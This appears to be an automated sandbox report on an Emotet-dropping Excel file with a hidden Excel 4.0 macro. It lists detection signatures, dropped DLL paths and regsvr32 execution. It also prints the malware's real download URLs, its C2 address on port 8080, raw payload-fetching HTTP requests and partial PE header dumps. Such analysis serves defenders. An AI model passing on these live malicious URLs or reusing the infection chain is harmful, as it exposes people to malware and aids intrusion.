Windows Analysis Report
DETAILS 25922194612.xls

Overview

General Information

Sample Name: DETAILS 25922194612.xls
Analysis ID: 632071
MD5: 3cfaa4009799dc19f12161241bbf7b03
SHA1: f36b5b095c84f4cf7e01eaf23de008a3362843a8
SHA256: 96eaa313abb56196eea9e8c4c20f78166b79894652e1cff740729d17aace22f0
Tags: SilentBuilderxls
Infos:

Detection

Hidden Macro 4.0, Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Office process drops PE file
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Downloads executable code via HTTP
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Registers a DLL
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Drops PE files to the user directory
Found large amount of non-executed APIs
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: DETAILS 25922194612.xls ReversingLabs: Detection: 41%
Antivirus detection for URL or domain
Source: http://learnviaonline.com/wp-admin/qGb/ Avira URL Cloud: Label: malware
Source: http://milanstaffing.com/images/D4TRnDubF/ Avira URL Cloud: Label: malware
Source: http://kolejleri.com/wp-admin/REvup/ Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: kolejleri.com Virustotal: Detection: 11% Perma Link
Source: milanstaffing.com Virustotal: Detection: 6% Perma Link
Source: learnviaonline.com Virustotal: Detection: 8% Perma Link
Source: stainedglassexpress.com Virustotal: Detection: 5% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll Metadefender: Detection: 28% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll ReversingLabs: Detection: 58%
Source: C:\Users\user\uxevr1.ocx ReversingLabs: Detection: 58%
Source: C:\Users\user\uxevr2.ocx ReversingLabs: Detection: 58%
Source: C:\Users\user\uxevr3.ocx ReversingLabs: Detection: 58%
Source: C:\Users\user\uxevr4.ocx Metadefender: Detection: 28% Perma Link
Source: C:\Users\user\uxevr4.ocx ReversingLabs: Detection: 60%
Source: C:\Windows\System32\Ejpzh\qlDqXeGagKnBKzd.dll (copy) ReversingLabs: Detection: 58%
Source: C:\Windows\System32\FiPeSYwmr\Wuiko.dll (copy) ReversingLabs: Detection: 58%
Source: C:\Windows\System32\KuSAkvGE\rWFJGQNl.dll (copy) ReversingLabs: Detection: 58%
Source: C:\Windows\System32\PLVmoWLosZJQb\bTjwWDTWvnC.dll (copy) Metadefender: Detection: 28% Perma Link
Source: C:\Windows\System32\PLVmoWLosZJQb\bTjwWDTWvnC.dll (copy) ReversingLabs: Detection: 60%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll Joe Sandbox ML: detected
Source: C:\Users\user\uxevr3.ocx Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll Joe Sandbox ML: detected
Source: C:\Users\user\uxevr1.ocx Joe Sandbox ML: detected
Source: C:\Users\user\uxevr4.ocx Joe Sandbox ML: detected
Source: C:\Users\user\uxevr2.ocx Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose, 4_2_000000018000BEF0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose, 7_2_000000018000BEF0
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose, 9_2_000000018000BEF0
Source: C:\Windows\System32\regsvr32.exe Code function: 11_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose, 11_2_000000018000BEF0

Software Vulnerabilities
barindex
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: Jf8[1].dll.0.dr Jump to dropped file
Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll Jump to behavior
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA Jump to behavior
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: learnviaonline.com
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 103.171.181.223:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 103.171.181.223:80

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\regsvr32.exe Network Connect: 165.22.73.229 8080 Jump to behavior
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: MYLOC-ASIPBackboneofmyLocmanagedITAGDE MYLOC-ASIPBackboneofmyLocmanagedITAGDE
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 103.171.181.223 103.171.181.223
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 23 May 2022 07:10:53 GMTServer: ApacheCache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Mon, 23 May 2022 07:10:53 GMTContent-Disposition: attachment; filename="Jf8.dll"Content-Transfer-Encoding: binarySet-Cookie: 628b337ddc562=1653289853; expires=Mon, 23-May-2022 07:11:53 GMT; Max-Age=60; path=/Last-Modified: Mon, 23 May 2022 07:10:53 GMTContent-Length: 371200Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 f5 7b 87 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 04 02 00 00 a2 03 00 00 00 00 00 80 35 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 06 00 00 04 00 00 c7 1d 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 b0 aa 02 00 84 00 00 00 e4 a1 02 00 50 00 00 00 00 00 03 00 fc e9 02 00 00 f0 02 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 f0 05 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa 03 02 00 00 10 00 00 00 04 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 8b 00 00 00 20 02 00 00 8c 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 37 00 00 00 b0 02 00 00 14 00 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 0f 00 00 00 f0 02 00 00 10 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 fc e9 02 00 00 00 03 00 00 ea 02 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 fc 06 00 00 00 f0 05 00 00 08 00 00 00 a2 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 23 May 2022 07:11:01 GMTServer: ApacheX-Powered-By: PHP/7.3.33Cache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Mon, 23 May 2022 07:11:01 GMTContent-Disposition: attachment; filename="1Cb5zOjLgWGDemz55C5.dll"Content-Transfer-Encoding: binarySet-Cookie: 628b3385b2519=1653289861; expires=Mon, 23-May-2022 07:12:01 GMT; Max-Age=60; path=/Last-Modified: Mon, 23 May 2022 07:11:01 GMTContent-Length: 371200X-Content-Type-Options: nosniffVary: User-AgentKeep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 f5 7b 87 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 04 02 00 00 a2 03 00 00 00 00 00 80 35 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 06 00 00 04 00 00 c7 1d 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 b0 aa 02 00 84 00 00 00 e4 a1 02 00 50 00 00 00 00 00 03 00 fc e9 02 00 00 f0 02 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 f0 05 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa 03 02 00 00 10 00 00 00 04 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 8b 00 00 00 20 02 00 00 8c 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 37 00 00 00 b0 02 00 00 14 00 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 0f 00 00 00 f0 02 00 00 10 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 fc e9 02 00 00 00 03 00 00 ea 02 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 fc 06 00 00 00 f0 05 00 00 08 00 00 00 a2 05 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8ikikikkikkikkikhkikkikkikk
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKConnection: Keep-AliveKeep-Alive: timeout=5, max=100x-powered-by: PHP/7.0.33set-cookie: 628b33891c2fb=1653289865; expires=Mon, 23-May-2022 07:12:05 GMT; Max-Age=60; path=/cache-control: no-cache, must-revalidatepragma: no-cachelast-modified: Mon, 23 May 2022 07:11:05 GMTexpires: Mon, 23 May 2022 07:11:05 GMTcontent-type: application/x-msdownloadcontent-disposition: attachment; filename="T35PENELLOsp.dll"content-transfer-encoding: binarycontent-length: 371200date: Mon, 23 May 2022 07:11:05 GMTserver: LiteSpeedvary: User-AgentData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 f5 7b 87 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 04 02 00 00 a2 03 00 00 00 00 00 80 35 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 06 00 00 04 00 00 c7 1d 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 b0 aa 02 00 84 00 00 00 e4 a1 02 00 50 00 00 00 00 00 03 00 fc e9 02 00 00 f0 02 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 f0 05 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa 03 02 00 00 10 00 00 00 04 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 8b 00 00 00 20 02 00 00 8c 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 37 00 00 00 b0 02 00 00 14 00 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 0f 00 00 00 f0 02 00 00 10 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 fc e9 02 00 00 00 03 00 00 ea 02 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 fc 06 00 00 00 f0 05 00 00 08 00 00 00 a2 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /wp-admin/qGb/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: learnviaonline.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-admin/REvup/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kolejleri.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /classes/05SkiiW9y4DDGvb6/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: stainedglassexpress.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /images/D4TRnDubF/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: milanstaffing.comConnection: Keep-Alive
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 165.22.73.229:8080
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: unknown TCP traffic detected without corresponding DNS query: 165.22.73.229
Source: regsvr32.exe, 00000004.00000002.1219527866.0000000002EE8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: regsvr32.exe, 00000004.00000002.1219527866.0000000002EE8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: regsvr32.exe, 00000004.00000003.988822373.0000000000361000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1219237595.0000000000361000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219171060.0000000000368000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.4.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 00000004.00000002.1219527866.0000000002EE8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219212394.00000000004C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme
Source: regsvr32.exe, 0000000B.00000002.1219557119.0000000002CE4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabmeroZe
